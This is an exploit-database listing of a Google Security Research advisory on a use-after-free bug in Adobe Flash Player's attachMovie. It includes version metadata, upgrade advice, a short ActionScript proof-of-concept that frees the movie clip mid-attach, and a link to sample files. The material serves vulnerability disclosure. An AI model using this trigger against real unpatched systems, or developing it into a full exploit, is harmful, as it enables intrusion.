header-logo
Suggest Exploit
vendor:
Flash Player
by:
Google Security Research
9.3
CVSS
HIGH
Use-after-free
416
CWE
Product Name: Flash Player
Affected Version From: Adobe Flash Player 18.0.0.203
Affected Version To: Adobe Flash Player 18.0.0.232
Patch Exists: YES
Related CWE: CVE-2015-7645
CPE: o:adobe:flash_player:18.0.0.232
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2015

Use-after-free in attachMovie due to the initObject

There is a use-after-free vulnerability in Adobe Flash Player due to the initObject. If the initObject contains an object that calls a method that deletes the movie clip that is being attached, a use-after-free occurs. A proof-of-concept is provided in the form of a sample fla and swf.

Mitigation:

Upgrade to the latest version of Adobe Flash Player.
Source

Exploit-DB raw data:

Source: https://code.google.com/p/google-security-research/issues/detail?id=391&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

There is a use-after-free in attachMovie due to the initObject. If the initObject contains an object that calls a method that deletes the movie clip that is being attached, a use-after-free occurs. A proof-of-concept is as follows:

n = {_quality : {toString : func}};
function func(){
	
	trace("hello");
	
	newResetButton.removeMovieClip();
	return "test";
	}
	
_root.attachMovie("myResetButton","newResetButton",200, n);

A sample fla and swf are attached.

Proof of Concept: 
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37865.zip